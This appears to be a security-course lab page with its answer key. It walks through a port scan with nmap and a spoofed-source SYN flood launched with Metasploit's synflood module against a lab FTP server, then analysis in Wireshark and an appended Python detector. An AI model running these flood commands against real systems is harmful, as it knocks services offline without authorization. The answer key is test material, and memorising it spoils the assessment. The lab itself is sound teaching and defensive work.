Lab 10.3.6 Perform and Analyze a SYN Flood Attack [WLOs: 1, 2, 3, 4, 5] [CLOs: 1, 2, 3]


Q1: What is the source IP address of the SYN flood attack?
Correct answer: 192.168.0.33

Q2: Which of the following MAC addresses is initiating the SYN flood attack?
Correct answer: 00:60:98:7F:41:E0 (IT-Laptop)

Explanation

In this lab, your task is to perform and monitor a SYN flood attack using the following information:

  • Use Zenmap to find the FTP port on CorpServer (192.168.0.10).
  • Use Metasploit to send a SYN flood attack as follows:
    • Remote host: 192.168.0.10
    • Source host: 192.168.0.33
    • Set the FTP port to match the FTP port used by CorpServer.
  • Use Wireshark to capture the SYN flood on the enp2s0 network interface.
  • Filter to show only TCP SYN packets.
  • Find the MAC address of the computer causing the SYN flood.
  • Answer the questions.

Complete this lab as follows:

  1. From Zenmap, use nmap to find the FTP port used on CorpServer as follows:
    1. From the Favorites bar, open Zenmap.
    2. In the Command field, type nmap -p 0-100 192.168.0.10
    3. Select Scan.
      CorpServer is using port 21 for FTP.
    4. Close Zenmap.
  2. Use Metasploit to send a SYN flood as follows:
    1. From the Favorites bar, open Metasploit Framework.
    2. At the prompt, type search synflood and press Enter to find a SYN flood Metasploit module.
    3. Type use auxiliary/dos/tcp/synflood and press Enter to select the SYN flood module.
    4. Type show options and press Enter to view the current options for the SYN flood module.
      Notice that RHOST and SHOST are unassigned and RPORT is set to port 80.
    5. Type set rhost 192.168.0.10 and press Enter to set the RHOST address.
    6. Type set shost 192.168.0.33 and press Enter to set the SHOST address.
    7. Type set rport 21 and press Enter to set the FTP port.
    8. Type show options and press Enter to view the new options for the SYN flood module.
      Notice that RHOST and SHOST have IP addresses assigned and RPORT is set to port 21 matching CorpServer.
  3. Capture SYN flood attacks on the CorpServer machine as follows:
    1. From the Favorites bar, open Wireshark.
    2. Under Capture, select enp2s0.
    3. In the Apply a display filter field, type host 192.168.0.10 and tcp.flags.syn==1
    4. Press Enter.
    5. Select the blue fin to begin a Wireshark capture.
      Notice that no packets are being captured.
  4. In Metasploit, type exploit and press Enter to start a SYN flood.
  5. Capture packets for a few seconds.
  6. In Wireshark, select the red box to stop the Wireshark capture.
    Notice the time between each packet sent to host 192.168.1.10. Notice that only SYN packets were captured.
  7. In the top right, select Answer Questions.
  8. Answer question 1.
  9. In the middle pane, expand Ethernet II.
    Notice the source MAC address of the computer sending the SYN flood.
  10. Answer question 2.
  11. Select Score Lab.
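
The analysis in steps 3 through 9 (filter for SYN packets, then read the Ethernet II source address) can also be run over captured frames in code. The following Python is an added example, not part of the original lab: it groups SYN-only packets by source MAC, because the source IP is whatever the sender set as SHOST. The sample frames, the 02:... MAC addresses, the 192.168.0.50 client and the threshold of 20 are constructed assumptions.

```python
import struct
from collections import Counter

def parse_syn(frame: bytes):
    """Return (src_mac, src_ip, dst_ip, dst_port) for a bare TCP SYN, else None."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":     # Ethernet II + IPv4 only
        return None
    ihl = (frame[14] & 0x0F) * 4                           # IPv4 header length
    if frame[14] >> 4 != 4 or ihl < 20 or frame[23] != 6:  # protocol 6 = TCP
        return None
    tcp = frame[14 + ihl:]
    # SYN set, ACK clear. Stricter than tcp.flags.syn==1, which also matches SYN-ACK.
    if len(tcp) < 20 or tcp[13] & 0x12 != 0x02:
        return None
    src_mac = ":".join(f"{b:02X}" for b in frame[6:12])
    src_ip = ".".join(map(str, frame[26:30]))
    dst_ip = ".".join(map(str, frame[30:34]))
    return src_mac, src_ip, dst_ip, struct.unpack("!H", tcp[2:4])[0]

def flood_sources(frames, threshold=20):
    """Group bare SYNs by (source MAC, dst IP, dst port); return groups >= threshold."""
    counts, ips = Counter(), {}
    for frame in frames:
        hit = parse_syn(frame)
        if hit:
            mac, src_ip, dst_ip, port = hit
            key = (mac, dst_ip, port)
            counts[key] += 1
            ips.setdefault(key, set()).add(src_ip)   # source IP is sender-chosen (SHOST)
    return [(k, n, sorted(ips[k])) for k, n in counts.most_common() if n >= threshold]

def make_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, flags):
    """Build a minimal in-memory frame for the constructed sample (checksums zeroed)."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    addr = lambda a: bytes(map(int, a.split(".")))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0, addr(src_ip), addr(dst_ip))
    tcp = struct.pack("!HHLLBBHHH", sport, dport, 0, 0, 0x50, flags, 1024, 0, 0)
    return mac(dst_mac) + mac(src_mac) + b"\x08\x00" + ip + tcp

# Constructed sample: lab addresses from the page; the 02:... MACs and .50 host are placeholders.
SERVER, LAPTOP, CLIENT = "02:00:00:00:00:10", "00:60:98:7F:41:E0", "02:00:00:00:00:50"
SAMPLE = [make_frame(LAPTOP, SERVER, "192.168.0.33", "192.168.0.10", 1024 + i, 21, 0x02)
          for i in range(50)]
SAMPLE += [make_frame(CLIENT, SERVER, "192.168.0.50", "192.168.0.10", 40000, 21, 0x02),  # SYN
           make_frame(SERVER, CLIENT, "192.168.0.10", "192.168.0.50", 21, 40000, 0x12),  # SYN-ACK
           make_frame(CLIENT, SERVER, "192.168.0.50", "192.168.0.10", 40000, 21, 0x10)]  # ACK

if __name__ == "__main__":
    for (mac, dst, port), n, src_ips in flood_sources(SAMPLE):
        print(f"{n} bare SYNs to {dst}:{port} from MAC {mac}, source IPs {src_ips}")
```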
